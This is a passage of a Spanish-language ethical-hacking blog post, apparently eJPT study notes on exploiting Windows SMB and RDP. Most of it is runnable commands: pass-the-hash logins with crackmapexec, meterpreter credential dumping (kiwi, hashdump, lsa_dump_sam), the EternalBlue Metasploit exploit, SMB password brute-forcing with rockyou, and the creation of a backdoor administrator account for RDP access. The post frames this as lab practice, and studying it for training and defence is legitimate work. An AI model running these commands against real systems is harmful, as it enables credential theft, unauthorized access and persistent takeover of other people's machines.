<h4 id="pass-the-hash-pth"><span class="me-2">Pass-the-Hash (PtH)</span><a href="#pass-the-hash-pth" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4>
<p>Si no logras descifrar el hash pero tienes el valor NTLM, puedes autenticarte directamente:</p>

<div class="language-shell highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="¡Copiado!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre>crackmapexec smb dominio.local <span class="nt">-u</span> Administrador <span class="nt">-H</span> <span class="s2">"NThash_aqui"</span> <span class="nt">-x</span> <span class="s2">"whoami"</span>
</pre></td></tr></tbody></table></code></div></div>
<h4 id="módulos-útiles-de-msfconsole"><span class="me-2">Módulos útiles de msfconsole</span><a href="#módulos-útiles-de-msfconsole" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4>
<div class="language-shell highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="¡Copiado!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
</pre></td><td class="rouge-code"><pre>meterpreter <span class="o">&gt;</span> load kiwi <span class="c">#permite sacar información de credenciales en equipos antiguos que tengan en texto en plano</span>
meterpreter <span class="o">&gt;</span> <span class="nb">help
</span>meterpreter <span class="o">&gt;</span> creds_all 
meterpreter <span class="o">&gt;</span> lsa_dump_sam <span class="c">#formato para hacer pass the hash</span>

meterpreter <span class="o">&gt;</span> load incognito <span class="c">#Permite acceder si el usuario no tiene el permiso de SeImpersonatePrivilege</span>
meterpreter <span class="o">&gt;</span> list_tokens <span class="nt">-u</span>
</pre></td></tr></tbody></table></code></div></div>

<h2 id="5-otras-vulnerabilidades-comunes-smb"><span class="me-2">5. Otras Vulnerabilidades Comunes SMB</span><a href="#5-otras-vulnerabilidades-comunes-smb" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<div class="language-shell highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="¡Copiado!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre></td><td class="rouge-code"><pre><span class="nb">ls </span>usr/share/nmap/scripts/ | <span class="nb">grep </span>smb <span class="c">#permite ver todos los scripts que tienen smb*</span>
nmap <span class="nt">-p</span> 445,139 <span class="nt">--script</span> smb-vuln<span class="k">*</span> dominio.local
</pre></td></tr></tbody></table></code></div></div>

<h3 id="smb-eternalblue-ms17-010"><span class="me-2">SMB: EternalBlue (MS17-010)</span><a href="#smb-eternalblue-ms17-010" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>
<p>Si el puerto 445 es vulnerable, Metasploit tiene un módulo directo:</p>
<div class="language-shell highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="¡Copiado!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
</pre></td><td class="rouge-code"><pre>msfconsole <span class="nt">-q</span>
<span class="o">&gt;</span> search <span class="nb">type</span>:exploit name:eternalblue
use exploit/windows/smb/ms17_010_eternalblue
<span class="nb">set </span>RHOSTS dominio.local
<span class="nb">set </span>LPORT 1234
run

meterpreter <span class="o">&gt;</span> getuid
meterpreter <span class="o">&gt;</span> hashdump
</pre></td></tr></tbody></table></code></div></div>

<p>Ahora es importante sacar solo los usuarios</p>
<div class="language-shell highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="¡Copiado!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
</pre></td><td class="rouge-code"><pre><span class="nb">cat </span>hashes.txt | <span class="nb">cut</span> <span class="nt">-d</span> <span class="s2">":"</span> <span class="nt">-f</span> 1 <span class="o">&gt;&gt;</span> users.txt
nmap <span class="nt">-p</span> 445 <span class="nt">--script</span> smb-brute <span class="nt">--script-args</span> <span class="nv">userdb</span><span class="o">=</span>users.txt,passdb<span class="o">=</span>users.txt dominio.local

<span class="nb">gzip</span> <span class="nt">-d</span> /usr/share/wordlists/rockyou.txt.gz
crackmapexec smb dominio.local <span class="nt">-u</span> users.txt <span class="nt">-p</span> /usr/share/wordlists/rockyou.txt <span class="nt">--continue-on-success</span>
</pre></td></tr></tbody></table></code></div></div>

<h3 id="rdp-bluekeep-cve-2019-0708"><span class="me-2">RDP: BlueKeep (CVE-2019-0708)</span><a href="#rdp-bluekeep-cve-2019-0708" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>
<p>Para escaneo de vulnerabilidades en Escritorio Remoto:</p>
<div class="language-shell highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="¡Copiado!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
</pre></td><td class="rouge-code"><pre>msfconsole <span class="nt">-q</span>
search bluekeep
use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
<span class="nb">set </span>rhosts dominio.local
run
</pre></td></tr></tbody></table></code></div></div>
<blockquote class="prompt-warning">
  <p>Advertencia: Al probar BlueKeep, utiliza solo el scanner. El exploit puede causar una Pantalla Azul (BSOD) en el objetivo</p>
</blockquote>

<h3 id="vulnerabilidad-pass-the-hash"><span class="me-2">Vulnerabilidad Pass the hash</span><a href="#vulnerabilidad-pass-the-hash" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>

<div class="language-shell highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="¡Copiado!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
</pre></td><td class="rouge-code"><pre>msfconsole <span class="nt">-q</span>
search exploit/windows/smb/psexec <span class="c">#Herramienta para hacer una conexión similar a ssh</span>
<span class="nb">set </span>rhosts dominio.local
<span class="nb">set </span>lport 1253
<span class="nb">set </span>SMBUSER Administrator
<span class="nb">set </span>SMBPASS hashlargo3:haslargo4
exploit
</pre></td></tr></tbody></table></code></div></div>

<p>Ahora se procede a ejecutar la misma vulnerabilidad con el hash pero con la herramienta crackmapexec</p>
<div class="language-shell highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="¡Copiado!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
</pre></td><td class="rouge-code"><pre>crackmapexec smb dominio.local <span class="nt">-u</span> usuario <span class="nt">-H</span> <span class="s2">"hashlargo4"</span> <span class="nt">-x</span> <span class="s2">"whoami"</span>
<span class="o">(</span>Pwn3d!<span class="o">)</span> <span class="c">#Significa que si puedo conectarme con ese hash.</span>
crackmapexec smb dominio.local <span class="nt">-u</span> usuario <span class="nt">-H</span> <span class="s2">"hashlargo4"</span> <span class="nt">-x</span> <span class="s2">"net user prueba password /add"</span>
crackmapexec smb dominio.local <span class="nt">-u</span> usuario <span class="nt">-H</span> <span class="s2">"hashlargo4"</span> <span class="nt">-x</span> <span class="s2">"net localgroup administrators prueba /add"</span>
crackmapexec smb dominio.local <span class="nt">-u</span> usuario <span class="nt">-p</span> password

rdesktop dominio.local <span class="c">#para conectarse con el nuevo usuario creado</span>
</pre></td></tr></tbody></table></code></div></div>

<h2 id="conclusión"><span class="me-2">Conclusión</span><a href="#conclusión" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>
<p>La explotación en Windows requiere una metodología clara: desde una enumeración minuciosa hasta el aprovechamiento de privilegios mal configurados como SeImpersonate. ¡A seguir practicando en laboratorios controlados!</p>

  </div>

  <div class="mt-5">
    <script src="https://giscus.app/client.js"
            data-repo="Balo93/balo93.github.io"
            data-repo-id="R_kgDOPnn18A"
            data-category="General"
            data-category-id="DIC_kwDOPnn18M4C0VSq"
            data-mapping="pathname"
            data-strict="0"
            data-reactions-enabled="1"
            data-emit-metadata="0"
            data-input-position="bottom"
            data-theme="preferred_color_scheme"
            data-lang="es"
            crossorigin="anonymous"
            async>
    </script>
  </div>

  <div class="post-tail-wrapper text-muted">
    
      <div class="post-meta mb-3">
        <i class="far fa-folder-open fa-fw me-1"></i>
        
          <a href="/categories/hacking/">Hacking</a>,
          <a href="/categories/vulnerabilidades/">Vulnerabilidades</a>,
          <a href="/categories/explotaci%C3%B3n/">Explotación</a>
      </div>
    

    
      <div class="post-tags">
        <i class="fa fa-tags fa-fw me-1"></i>
        
          <a href="/tags/cracking/" class="post-tag no-text-decoration">cracking</a>
        
          <a href="/tags/enumeraci%C3%B3n/" class="post-tag no-text-decoration">enumeración</a>
        
          <a href="/tags/nmap/" class="post-tag no-text-decoration">Nmap</a>
        
          <a href="/tags/metasploit/" class="post-tag no-text-decoration">Metasploit</a>
        
          <a href="/tags/hydra-y-crackmapexec/" class="post-tag no-text-decoration">Hydra y CrackMapExec</a>
        
      </div>
    

    <div class="post-tail-bottom d-flex justify-content-between align-items-center mt-5 pb-2">
      <div class="license-wrapper">
        
          
          Esta entrada está licenciada bajo 
            <a href="https://creativecommons.org/licenses/by/4.0/">
              CC BY 4.0
            </a>
           por el autor.
        
      </div>
      <!-- Post sharing snippet -->

<div class="share-wrapper d-flex align-items-center">
  <span class="share-label text-muted">Compartir</span>
  <span class="share-icons">
    
    
    

    

      

      <a href="https://twitter.com/intent/tweet?text=An%C3%A1lsis%20de%20Vulnerabilidades%20y%20Explotaci%C3%B3n%20-%20CyberBalo&url=https%3A%2F%2Fbalo93.github.io%2Fposts%2Fanalisis-vuln-enum%2F" target="_blank" rel="noopener" data-bs-toggle="tooltip" data-bs-placement="top" title="Twitter" aria-label="Twitter">
        <i class="fa-fw fa-brands fa-square-x-twitter"></i>
      </a>
    

      

      <a href="https://www.facebook.com/sharer/sharer.php?title=An%C3%A1lsis%20de%20Vulnerabilidades%20y%20Explotaci%C3%B3n%20-%20CyberBalo&u=https%3A%2F%2Fbalo93.github.io%2Fposts%2Fanalisis-vuln-enum%2F" target="_blank" rel="noopener" data-bs-toggle="tooltip" data-bs-placement="top" title="Facebook" aria-label="Facebook">
        <i class="fa-fw fab fa-facebook-square"></i>
      </a>
    

      

      <a href="https://t.me/share/url?url=https%3A%2F%2Fbalo93.github.io%2Fposts%2Fanalisis-vuln-enum%2F&text=An%C3%A1lsis%20de%20Vulnerabilidades%20y%20Explotaci%C3%B3n%20-%20CyberBalo" target="_blank" rel="noopener" data-bs-toggle="tooltip" data-bs-placement="top" title="Telegram" aria-label="Telegram">
        <i class="fa-fw fab fa-telegram"></i>
      </a>
    

    <button
      id="copy-link"
      aria-label="Copy link"
      class="btn small"
      data-bs-toggle="tooltip"
      data-bs-placement="top"
      title="Copiar enlace"
      data-title-succeed="¡Enlace copiado!"
    >
      <i class="fa-fw fas fa-link pe-none fs-6"></i>
    </button>
  </span>
</div>

    </div>
  </div>
</article>

            
          </main>

          <!-- panel -->
          <aside aria-label="Panel" id="panel-wrapper" class="col-xl-3 ps-2 text-muted">
            <div class="access">
              <!-- Get 5 last posted/updated posts -->














  <section id="access-lastmod">
    <h2 class="panel-heading">Actualizado recientemente</h2>
    <ul class="content list-unstyled ps-0 pb-1 ms-1 mt-2">
      
        
        
        
        <li class="text-truncate lh-lg">
          <a href="/posts/laboratorios/">Resolución de Laboratorios</a>
        </li>
      
        
        
        
        <li class="text-truncate lh-lg">
          <a href="/posts/reconocimiento-pasivo/">Reconocimiento Pasivo: El Arte de Investigar sin ser Visto</a>
        </li>
      
        
        
        
        <li class="text-truncate lh-lg">
          <a href="/posts/Recomendaciones-ejpt/">Recomendaciones eJPT</a>
        </li>
      
        
        
        
        <li class="text-truncate lh-lg">
          <a href="/posts/reconocimiento-activo/">Reconocimiento Activo: El Arte de Investigar</a>
        </li>
      
        
        
        
        <li class="text-truncate lh-lg">
          <a href="/posts/enum-crack-pass/">Enumeración - Cracking de contraseñas</a>
        </li>
      
    </ul>
  </section>
  <!-- #access-lastmod -->


              <!-- The trending tags list -->















  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
      
        
        

  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
      
        
        



  <section>
    <h2 class="panel-heading">Etiquetas populares</h2>
    <div class="d-flex flex-wrap mt-3 mb-1 me-3">
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/cracking/">cracking</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/enumeraci%C3%B3n/">enumeración</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/hacking-etico/">hacking-etico</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/hydra-y-crackmapexec/">Hydra y CrackMapExec</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/metasploit/">Metasploit</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/nmap/">Nmap</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/osint/">osint</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/activo/">activo</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/ejpt/">ejpt</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/footprinting/">footprinting</a>
      
    </div>
  </section>


            </div>

            
              
              






  <div class="toc-border-cover z-3"></div>
  <section id="toc-wrapper" class="invisible position-sticky ps-0 pe-4 pb-4">
    <h2 class="panel-heading ps-3 pb-2 mb-0">Contenido</h2>
    <nav id="toc"></nav>
  </section>


            
          </aside>
        </div>

        <div class="row">
          <!-- tail -->
          <div id="tail-wrapper" class="col-12 col-lg-11 col-xl-9 px-md-4">
            
              
              <!-- Recommend the other 3 posts according to the tags and categories of the current post. -->

<!-- The total size of related posts -->


<!-- An random integer that bigger than 0 -->


<!-- Equals to TAG_SCORE / {max_categories_hierarchy} -->















  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
    
  

  

  

  

  

  











  <aside id="related-posts" aria-labelledby="related-label">
    <h3 class="mb-4" id="related-label">Lecturas adicionales</h3>
    <nav class="row row-cols-1 row-cols-md-2 row-cols-xl-3 g-4 mb-4">
      
        <article class="col">
          <a href="/posts/laboratorios/" class="post-preview card h-100">
            <div class="card-body">
              <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->




<time
  
  data-ts="1776224340"
  data-df="DD/MM/YYYY"
  
>
  14/04/2026
</time>

              <h4 class="pt-0 my-2">Resolución de Laboratorios</h4>
              <div class="text-muted">
                <p>Laboratorios.</p>
              </div>
            </div>
          </a>
        </article>
      
        <article class="col">
          <a href="/posts/enum-crack-pass/" class="post-preview card h-100">
            <div class="card-body">
              <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->




<time
  
  data-ts="1771191900"
  data-df="DD/MM/YYYY"
  
>
  15/02/2026
</time>

              <h4 class="pt-0 my-2">Enumeración - Cracking de contraseñas</h4>
              <div class="text-muted">
                <p>Cómo enumerar usuarios y crackear contraseñas de servicios vulnerables.</p>
              </div>
            </div>
          </a>
        </article>
      
        <article class="col">
          <a href="/posts/reconocimiento-activo/" class="post-preview card h-100">
            <div class="card-body">
              <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->




<time
  
  data-ts="1766987100"
  data-df="DD/MM/YYYY"
  
>
  29/12/2025
</time>

              <h4 class="pt-0 my-2">Reconocimiento Activo: El Arte de Investigar</h4>
              <div class="text-muted">
                <p>Guía estratégica para realizar una recolección de información (OSINT) efectiva y ética.</p>
              </div>
            </div>
          </a>
        </article>
      
    </nav>
  </aside>
  <!-- #related-posts -->


            
              
              <!-- Navigation buttons at the bottom of the post. -->

<nav class="post-navigation d-flex justify-content-between" aria-label="Post Navigation">
  
  

  
    <a
      href="/posts/enum-crack-pass/"
      class="btn btn-outline-primary"
      aria-label="Anterior"
    >
      <p>Enumeración - Cracking de contraseñas</p>
    </a>
  

  
    <a
      href="/posts/laboratorios/"
      class="btn btn-outline-primary"
      aria-label="Nuevo"
    >
      <p>Resolución de Laboratorios</p>
    </a>
  
</nav>

            

            <!-- The Footer -->

<footer
  aria-label="Site Info"
  class="
    d-flex flex-column justify-content-center text-muted
    flex-lg-row justify-content-lg-between align-items-lg-center pb-lg-3
  "
>
  <p>©
    <time>2026</time>

    
      <a href="https://twitter.com/alvarogbalo">Alvaro Gavilanes</a>.
    

    
      <span
        data-bs-toggle="tooltip"
        data-bs-placement="top"
        title="Salvo que se indique explícitamente, las entradas de este blog están licenciadas bajo la Creative Commons Attribution 4.0 International (CC BY 4.0) License por el autor."
      >Algunos derechos reservados.</span>
    
  </p>

  <p>Hecho con <a href="https://jekyllrb.com" target="_blank" rel="noopener">Jekyll</a> usando el tema <a
        data-bs-toggle="tooltip"
        data-bs-placement="top"
        title="v7.3.1"
        href="https://github.com/cotes2020/jekyll-theme-chirpy"
        target="_blank"
        rel="noopener"
      >Chirpy</a>
  </p>
</footer>

          </div>
        </div>

        <!-- The Search results -->

<div id="search-result-wrapper" class="d-flex justify-content-center d-none">
  <div class="col-11 content">
    <div id="search-hints">
      <!-- The trending tags list -->















  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
      
        
        

  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
      
        
        



  <section>
    <h2 class="panel-heading">Etiquetas populares</h2>
    <div class="d-flex flex-wrap mt-3 mb-1 me-3">
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/cracking/">cracking</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/enumeraci%C3%B3n/">enumeración</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/hacking-etico/">hacking-etico</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/hydra-y-crackmapexec/">Hydra y CrackMapExec</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/metasploit/">Metasploit</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/nmap/">Nmap</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/osint/">osint</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/activo/">activo</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/ejpt/">ejpt</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/footprinting/">footprinting</a>
      
    </div>
  </section>


    </div>
    <div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div>
  </div>
</div>

      </div>

      <aside aria-label="Scroll to Top">
        <button id="back-to-top" type="button" class="btn btn-lg btn-box-shadow">
          <i class="fas fa-angle-up"></i>
        </button>
      </aside>
    </div>

    <div id="mask" class="d-none position-fixed w-100 h-100 z-1"></div>

    
      <aside
  id="notification"
  class="toast"
  role="alert"
  aria-live="assertive"
  aria-atomic="true"
  data-bs-animation="true"
  data-bs-autohide="false"
>
  <div class="toast-header">
    <button
      type="button"
      class="btn-close ms-auto"
      data-bs-dismiss="toast"
      aria-label="Close"
    ></button>
  </div>
  <div class="toast-body text-center pt-0">
    <p class="px-2 mb-3">Hay una nueva versión de contenido disponible.</p>
    <button type="button" class="btn btn-primary" aria-label="Update">
      Actualizar
    </button>
  </div>
</aside>

    

    <!-- Embedded scripts -->

    
      
      <!-- The comments switcher -->


    

    <!--
  Jekyll Simple Search loader
  See: <https://github.com/christian-fei/Simple-Jekyll-Search>
-->





<script>
  
  document.addEventListener('DOMContentLoaded', () => {
    SimpleJekyllSearch({
      searchInput: document.getElementById('search-input'),
      resultsContainer: document.getElementById('search-results'),
      json: '/assets/js/data/search.json',
      searchResultTemplate: '  <article class="px-1 px-sm-2 px-lg-4 px-xl-0">    <header>      <h2><a href="{url}">{title}</a></h2>      <div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1">        {categories}        {tags}      </div>    </header>    <p>{content}</p>  </article>',
      noResultsText: '<p class="mt-5">¡Oops! No se encuentran resultados.</p>',
      templateMiddleware: function(prop, value, template) {
        if (prop === 'categories') {
          if (value === '') {
            return `${value}`;
          } else {
            return `<div class="me-sm-4"><i class="far fa-folder fa-fw"></i>${value}</div>`;
          }
        }

        if (prop === 'tags') {
          if (value === '') {
            return `${value}`;
          } else {
            return `<div><i class="fa fa-tag fa-fw"></i>${value}</div>`;
          }
        }
      }
    });
  });
</script>

  </body>
</html>

